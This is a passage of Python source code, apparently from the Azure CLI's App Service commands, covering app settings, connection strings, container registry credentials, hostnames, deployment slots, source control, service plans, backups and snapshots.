delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is already used in azure.cli.core.commands,
# and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
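# Falls back to an explicit SSLContext on Python < 3.4 (and in Cloud Shell on
# Windows), preferring PROTOCOL_TLS when available; newer interpreters simply
# use ssl.create_default_context().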
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform == 'win32'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
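# Example of the expected --settings / --slot-settings entry format (names and values are hypothetical):
#   "MyDb='Server=tcp:myserver.database.windows.net;Database=mydb'"
# Each entry is split at the first '=', and a single pair of surrounding quotes on the value is stripped.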
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
            logger.warning("Retrieving credentials failed with an exception: '%s'", ex)  # consider raising if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('--multicontainer-config-file FILE and '
                       '--multicontainer-config-type TYPE must be used together')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
        raise CLIError("Found zero or multiple container registries with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
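# Sketch of the masking above when given a settings dict (values are hypothetical):
#   {'DOCKER_REGISTRY_SERVER_PASSWORD': 'secret', 'WEBSITE_TIME_ZONE': 'UTC'}
#   becomes
#   {'DOCKER_REGISTRY_SERVER_PASSWORD': None, 'WEBSITE_TIME_ZONE': 'UTC'}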
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
    # the logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig = cmd.get_models('Site', 'SiteConfig')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
        raise CLIError('The following parameters are only applicable when cd_project_url is specified: '
                       'cd_app_type, app_working_dir, nodejs_task_runner, python_framework, '
                       'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # retry up to 4 times on server errors (50x); anything else is raised immediately
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
    the command will clear the existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
            raise CLIError('Windows containers are not yet supported in an App Service Environment')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
        logger.warning('Nothing to update. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
DefaultErrorResponseException, BackupSchedule, BackupRequest = cmd.get_models(
'DefaultErrorResponseException', 'BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
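# Examples of the frequency parsing above (FrequencyUnit comes from the SDK models):
#   '7d'  -> (7, FrequencyUnit.day)
#   '12h' -> (12, FrequencyUnit.hour)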
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
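# The resulting URL typically looks like the following (app and user names are hypothetical):
#   https://deployuser@myapp.scm.azurewebsites.net/myapp.git
# where the host comes from the app's source control repo_url and the user from the publishing profile.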
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
    Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
